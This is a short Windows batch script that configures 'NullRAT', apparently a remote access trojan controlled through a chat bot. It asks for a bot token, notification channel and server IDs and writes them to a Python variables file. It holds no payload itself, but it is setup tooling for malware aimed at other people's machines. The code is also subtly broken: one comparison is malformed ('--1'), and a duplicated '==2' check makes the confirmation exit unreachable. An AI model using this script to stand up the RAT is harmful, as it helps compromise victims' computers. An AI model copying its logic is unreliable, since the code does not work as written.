@echo off & @color A & @title NullRAT Variables

cls & cd "%~dp0src"
IF EXIST "Variables.py" (goto fileE) else (goto createF)

:createF
set /p "token=Enter Bot Token: "
set /p "notification=Enter Notification ID: "
set /p "server=Enter Server ID: "

cd "%~dp0src"
echo ^# This file was auto-generated by NullRAT Variables^. DO NOT SHARE^! > Variables.py
echo bot_token = ^"%token%^" >> Variables.py
echo notification_channel = %notification% >> Variables.py
echo server_ids = ^[%server%^] >> Variables.py

echo, & echo All variables properly saved & PAUSE & EXIT

:fileE
echo A pre-existing variables file was detected.
choice /c YN /n /m "Do you want to check its contents? [Y/N]"
if %errorlevel%==2 (echo. & echo Proceeding to create a new file & goto createF)
if %errorlevel%--1 (
	echo.
	type Variables.py
	echo.
	choice /c YN /n /m "Are all these information correct? [Y/N] "
	if %errorlevel%==2 (echo. & echo Proceeding to make a new variables file & goto createF)
	if %errorlevel%==2 (echo. & echo The following information is correct. Closing... & timeout /t 2 >nul & exit)	
)
